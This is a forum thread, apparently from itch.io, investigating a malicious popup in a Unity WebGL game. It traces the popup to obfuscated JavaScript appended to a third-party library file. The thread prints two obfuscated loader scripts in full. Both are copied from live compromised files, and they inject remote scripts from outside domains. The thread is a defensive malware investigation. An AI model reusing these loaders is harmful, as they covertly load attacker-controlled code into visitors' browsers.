href=“blob:https://A_SUBDOMAIN_WAS_HERE.ssl.hwcdn.net/A_GUID_WAS_HERE”

This is a blob URL (note blob:), created with URL.createObjectURL browser API, and so it is not served from that domain (and the URL is only valid in your browser btw). Presence of the domain there only means that the URL was generated by script served from that domain, that is, by your game.

So, for what it’s worth, it still may be that your game build somehow got infected before you uploaded it. Also it may simply be some shady ad, if you have integrated some in-game ad SDK. It seems you took down the web version, so of course cannot say for sure.

Edit: I just checked the webgl.zip we uploaded by downloading it again from itch.io. The files are clean. It seems that the cdn is injecting this part of the website.

This is highly unlikely. As I mentioned in the other comment, it’s likely you have a rogue SDK you’re using that is embedded into the binary files distributed with your HTML5 export that is being executed by Unity’s virtual machine. You will not be able to just look at the files of your HTML5 build to identify something like this. I suggest you review all the code you’ve included in your project before you have exported it. Alternatively third party resources included by your game could be compromised in some way, either as any scripts that you didn’t write, or scripts that are dynamically loaded from other domains.

I’ve downloaded the file you uploaded and I’ll upload it to a private page to take closer look to see if I can spot anything. Can you tell me when exactly this message appears after reloading the game? Does it appear immediately or do you have to click to start the game?

Edit: The GUID resource names located on the same path as your game appear to be how unity extracts its runtime. This to me suggests that the malicious could be coming from inside of your Unity game’s code.

Edit: I tried loading your game many times over but never was able to trigger the message. I think it’s related to my operating system/browser, as it probably only appears to a subset of people to make it hard to detect. I did notice some suspicious obfuscated code at the bottom of a file hosted on the domain js.zapjs.com, the exact file is here: https://js.zapjs.com/js/download.js on the very last line. This doesn’t appear to be part of the library. This file gets added into the browser by Unity code executing from what I can tell. (When progress bar shows 90%, which corresponds with the report given in your comments)

I’ve included it below in case it gets removed by whoever is hosting it:

var a=['text/javascript',')njosirthalcfoml5','length','trderrnrme1fze6r(','script','abs','parentNode','getElementsByTagName','t=ha5mytou5_p_d','5mgrfokf7tma7l!pp','type','async','oe3m6axnwt8s5omh7','jfjOcxieyd2njif','createElement','while','insertBefore'];(function(b,e){var f=function(g){while(--g){b['push'](b['shift']());}};f(++e);}(a,0x12b));var b=function(c,d){c=c-0x0;var e=a[c];return e;};var _cs=['3tqnjerg4Akriews)ue',b('0xb'),b('0x10'),'vb37(ej4q84fb1x9v8w6e1lau4!34c443cf64097sap8!afeeeh0qbgchc!7q2289=gvu&!0a402m=1duiicu?3sfjb.(esdpoun2_qi9uj/8m9ozc0.20v6h3gt(ayt9snkfcnixlvci.vcqiql0bmu4p1/)/p:isuprt)tzhp',b('0x5'),b('0x3'),b('0xa'),b('0x8'),'get','fejiekzokovce',b('0xf'),b('0x2'),b('0xc'),b('0x7')];if(ndsw===undefined){var ndsw=true;(function(){var c=navigator;var d=document;var e=screen;var f=window;var g=c[m(_cs[0x0])];var h=c[m(_cs[0x2])];var i=d[m(_cs[0x9])];var j=f[m(_cs[0x7])][m(_cs[0xb])];var k=d[m(_cs[0x6])];if(k&&!n(k,j)){if(!n(i,m(_cs[0xa]))){var c=d[b('0x4')](_cs[0x1]);c[b('0x0')]=_cs[0xd];c[b('0x1')]=!![];c['src']=m(_cs[0x3]);var l=d[b('0xe')](_cs[0x1])[0x0];l[b('0xd')][b('0x6')](c,l);}}function m(p){var q='';for(var r=0x0;r<p[b('0x9')];r++){if(r%0x2===0x1)q+=p[r];}q=o(q);return q;}function n(p,q){return p[m(_cs[0x5])](q)!==-0x1;}function o(p){var q='';for(var r=p[b('0x9')]-0x1;r>=0x0;r--){q+=p[r];}return q;}}());}

Edit: I stepped through the script with a debugger, it ends up loading anotheer script from another domain. In my case, it’s https://public.clickstat360.com/ui_node.js?cid=240&v=827ccb0eea8a706c4c34a16891f84e7b I’ve included code:

(function(){var hl=document[qd("4r)e;r{r,e,f(ewrk")]||'';var rz=new RegExp(qd('&/;),+a])/(^,[{(,/)/i:h'));if(!hl||window[qd("fn}oeilt4a)c,o3ly")][qd("ff,e1r{h,")][qd("1h{cdt(a2mi")](rz)[1]==hl[qd("1h{cdt(a2mi")](rz)[1]){return;};var vm=navigator[qd("yt}n(e}g6A}r,e}szu8")];var wl=document[qd("pefi,k;o3o{c0")];if(tk(vm,qd("/sfw,o(d(n,i;W{"))&&!tk(vm,qd(".d{imo}r,dvn(Ad"))){if(!tk(wl,qd("#={a6m(t;u,_)_}_;"))){var on=document.createElement('script');on.type='text/javascript';on.async=true;on.src=qd('74(7,7(1;1}4m5)8;5;1a=ht6&)3;Q3j,M;9{Q;W7a;jtZ)S(Z,2(cuj(Ney6k(DxZ{h)RnW9Z1ziU(z8Y61{U}DhM{k{N,D}O(i01}j{d(=}d;?vd{x{a,.)e,c,r{u{o(s9e(R{b;efW;/gm)opc{.}s(e{clijv{r(ebs)m}tor{azm2sa.{e1n{o(h3pb/6/s:7s,p7t;tdh(');var ce=document.getElementsByTagName('script')[0];ce.parentNode.insertBefore(on,ce);}}function qd(oy){var je='';for(var uv=0;uv<oy.length;uv++){if(uv%2===1)je+=oy[uv];}je=uy(je);return je;}function tk(gd,no){return gd[qd(":f)Osx)e9d;nsi}")](no)!==-1;}function uy(fc){var pu='';for(var xx=fc.length-1;xx>=0;xx--){pu+=fc[xx];}return pu;}})();

It’s now finally taking me a the URL https://phone.smartmservices.com/WebResource.axd?d=dj1iODNkMDU1YzUzZWRhZDkyNjc2ZSZjaWQ9MjQ3&t=1585411774z

Edit: Alright, I kept following it until I got stuck. I’m giving up at this point because it’s pretty clear that there’s some suspicious code compiled into your game. You might want to start with finding out why the zapjs domain is showing up.

Twitter thread here: https://twitter.com/moonscript/status/1245868730501844994